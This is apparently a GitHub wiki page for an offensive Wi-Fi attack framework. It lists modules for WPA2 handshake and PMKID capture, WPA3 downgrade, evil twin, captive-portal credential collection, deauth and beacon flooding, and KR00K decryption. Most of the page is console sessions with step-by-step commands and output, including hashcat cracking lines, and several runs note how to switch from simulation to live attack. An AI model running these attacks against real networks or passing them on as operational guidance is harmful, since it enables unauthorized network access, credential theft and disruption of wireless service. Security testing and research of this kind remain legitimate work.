-
Notifications
You must be signed in to change notification settings - Fork 2
Wi Fi Attacks
André Henrique edited this page Jun 8, 2026
·
1 revision
Complete reference for WPA2, WPA3, WPE/EAPOL, and 802.11 attack modules.
| Module | Description |
|---|---|
wifi_lab/fragattacks |
FragAttacks (CVE-2020-26140+) - see FragAttacks |
wifi_lab/handshake_snooper |
PMKID-first + deauth handshake capture pipeline |
wifi_lab/wpa3_attack_suite |
Dragonblood SAE flood, CSA+harvest, Double SSID, downgrade |
wifi_lab/auth_flood |
Auth/EAPOL flood, amok mode, mesh flood (mdk4 backend) |
wifi_lab/beacon_flood |
Beacon spam with custom SSIDs |
wifi_lab/evil_twin_workflow |
Full evil-twin with verify-on-capture |
wifi_lab/captive_portal_modern_lab |
Modern captive portal with HTML/JS credential collector |
wifi_lab/mitm_wifi_bridge |
ARP/DNS spoofing + Ghost combo (bettercap) |
wifi_lab/adaptive_harvest |
Score-driven channel/PMKID adaptive harvesting |
wifi_lab/wardriving_deauth_loop |
Automated wardriving scan/deauth/capture cycles |
wifi_lab/wireless_ids |
Lightweight IDS: BSSID baseline + rogue AP detection |
wifi_lab/awdl_attack |
AWDL/AirDrop (opendrop + owl) - discover, send, DoS |
wifi_lab/momo_integrated_attack |
KARMA + PMKID-first + downgrade orchestration |
wifi_lab/research_ecosystem_status |
Status of all research submodule integrations |
wifi_lab/gps_wardriving_ndjson |
GPS NMEA -> NDJSON wardriving log |
wifi_lab/wifi_sniffer |
Multi-backend sniffer (tcpdump/scapy/tshark) |
wifi_lab/wifi_kr00k_cve_2019_15126 |
CVE-2019-15126 KR00K: deauth + CCMP zero-TK decryption |
wxf > use generic/wifi_lab/handshake_snooper
wxf (HandshakeSnooper) > set INTERFACE wlan0mon
wxf (HandshakeSnooper) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (HandshakeSnooper) > run
[*] Starting handshake capture on wlan0mon
[*] Target: AA:BB:CC:DD:EE:FF (HomeWifi) ch6 WPA2-PSK
[*] Attempting PMKID capture (clientless)...
[+] PMKID captured: 4d4f4e4f3a3a3a3aaabbccddeeff...
[*] Saving to /tmp/capture_AABBCCDDEEFF.pcap
[+] Capture complete. Crack with: hashcat -m 22000 capture.hc22000 rockyou.txt
Without PMKID, falls back to deauth-triggered 4-way capture:
[*] PMKID not available - attempting deauth + EAPOL capture
[*] Sending 5 deauth frames to force client reconnect...
[*] Monitoring for EAPOL 4-way handshake...
[+] Handshake captured (4-way EAPOL, all 4 messages)
[+] CCMP/TKIP: check with aircrack-ng or hashcat -m 22000
WPA3 uses SAE (Simultaneous Authentication of Equals, also called Dragonfly) instead of PSK. The Dragonblood vulnerabilities allow downgrade and side-channel attacks against WPA3 implementations.
wxf > use generic/wifi_lab/wpa3_attack_suite
wxf (WPA3AttackSuite) > show options
Options:
INTERFACE wlan0mon Monitor mode interface
TARGET_BSSID (required) Target AP BSSID
ATTACK_TYPE all Attack vector (sae_flood, downgrade, double_ssid, csa_harvest)
SIMULATE true Dry-run
wxf (WPA3AttackSuite) > set INTERFACE wlan0mon
wxf (WPA3AttackSuite) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (WPA3AttackSuite) > set ATTACK_TYPE downgrade
wxf (WPA3AttackSuite) > set SIMULATE true
wxf (WPA3AttackSuite) > run
[SIMULATE] WPA3 Downgrade Attack (CVE-2019-13377)
[SIMULATE] Target: AA:BB:CC:DD:EE:FF
[SIMULATE] Creating rogue AP: same SSID (HomeWifi), WPA2-only capability advertisement
[SIMULATE] Sending Channel Switch Announcement (CSA) to move clients to rogue AP
[SIMULATE] Once clients associate to rogue AP, capture WPA2 handshake for cracking
[!] Set SIMULATE=false to run
[!] Requires: wlan0 (managed) + wlan0mon (monitor) + hostapd/dnsmasq
wxf > use generic/wifi_lab/evil_twin_workflow
wxf (EvilTwin) > set INTERFACE wlan0mon
wxf (EvilTwin) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (EvilTwin) > set TARGET_ESSID HomeWifi
wxf (EvilTwin) > set CHANNEL 6
wxf (EvilTwin) > set SIMULATE true
wxf (EvilTwin) > run
[SIMULATE] Evil Twin Workflow
[SIMULATE] Phase 1: Deauth all clients from AA:BB:CC:DD:EE:FF (HomeWifi) ch6
[SIMULATE] Phase 2: Start rogue AP: SSID=HomeWifi, channel=6, OPEN (captive)
[SIMULATE] Phase 3: DHCP + DNS server on rogue AP
[SIMULATE] Phase 4: Monitor for client associations
[SIMULATE] Phase 5: Capture WPA2 handshake when client retries real AP
[SIMULATE] - Verify captured handshake against captured clients
[SIMULATE] - Export for aircrack-ng / hashcat
[!] Set SIMULATE=false
[!] PREREQ: hostapd + dnsmasq installed
wxf > use generic/wifi_lab/auth_flood
wxf (AuthFlood) > set INTERFACE wlan0mon
wxf (AuthFlood) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (AuthFlood) > set MODE deauth
wxf (AuthFlood) > set SIMULATE true
wxf (AuthFlood) > run
[SIMULATE] Deauth flood against AA:BB:CC:DD:EE:FF
[SIMULATE] Frames: 100/s, broadcast client (FF:FF:FF:FF:FF:FF), reason 0x07
[!] Set SIMULATE=false to run
[!] PREREQ: wlan0mon in monitor mode on same channel as target
wxf > use generic/wifi_lab/beacon_flood
wxf (BeaconFlood) > set INTERFACE wlan0mon
wxf (BeaconFlood) > set SSID_COUNT 500
wxf (BeaconFlood) > set CHANNEL 6
wxf (BeaconFlood) > set SIMULATE true
wxf (BeaconFlood) > run
[SIMULATE] Beacon flood: 500 unique SSIDs on channel 6
[SIMULATE] Rotates SSIDs and MACs to avoid deduplication
[SIMULATE] Approx rate: 50 beacons/s
[!] Set SIMULATE=false (uses mdk4 backend)
[!] PREREQ: mdk4 installed
KR00K affects Broadcom and Cypress 802.11 chips. After a deauthentication, the chip transmits buffered data frames encrypted with an all-zeros TK (Temporal Key), allowing decryption of those frames without the WPA2 passphrase.
wxf > use generic/wifi_lab/wifi_kr00k_cve_2019_15126
wxf (KR00K) > show info
Name: KR00K Unauthenticated CCMP Decryption
CVE: CVE-2019-15126
CVSS: 6.5 (Medium)
Target: Devices with Broadcom BCM4375, BCM4389 or Cypress CYW43xx chips
(includes many iPhones, MacBooks, Kindles, Raspberry Pi, many routers)
Auth: None required (attacker just needs to be in WiFi range)
Description:
After receiving a deauth frame, the affected chip clears the TK to all zeros
but continues to transmit buffered frames using the zeroed key.
These frames can be trivially decrypted by an observer.
Exposes partial network traffic including DNS queries, HTTP requests, etc.
wxf (KR00K) > set INTERFACE wlan0mon
wxf (KR00K) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (KR00K) > set TARGET_STA 11:22:33:44:55:66
wxf (KR00K) > set SIMULATE true
wxf (KR00K) > run
[SIMULATE] CVE-2019-15126 KR00K
[SIMULATE] Step 1: Send deauth to 11:22:33:44:55:66 from AA:BB:CC:DD:EE:FF
[SIMULATE] Step 2: Capture frames transmitted immediately after deauth
[SIMULATE] Expected: buffered frames encrypted with TK=00:00:00:00:...
[SIMULATE] Step 3: Decrypt captured frames with all-zeros CCMP key
[SIMULATE] Potential exposure: last 5-15 seconds of buffered traffic
[!] Set SIMULATE=false to run
[!] PREREQ: wlan0mon on target channel
[!] NOTE: Affects many common devices from 2016-2019, patched in 2020
wxf > use generic/pcap/pcap_handshake_extractor
wxf (PCAPHandshakeExtractor) > set PCAP_FILE /captures/office.pcap
wxf (PCAPHandshakeExtractor) > run
[*] Analyzing /captures/office.pcap...
[+] Handshake found: AA:BB:CC:DD:EE:FF (HomeWifi) - 4-way EAPOL complete
[+] Handshake found: 11:22:33:44:55:66 (GuestNet) - partial (msg1,2 only)
[+] PMKID found: FF:EE:DD:CC:BB:AA (OfficeWifi)
[*] Exported: /captures/office_handshakes.hc22000
[*] Crack: hashcat -m 22000 /captures/office_handshakes.hc22000 rockyou.txt
Related pages: FragAttacks | KRACK | Bluetooth & BLE
Author: Andre Henrique (@mrhenrike) | Uniao Geek
Primeiros Passos
Ataques Wireless
Drones e UAV
Protocolos Especializados
Ferramentas de Pentest
Hardware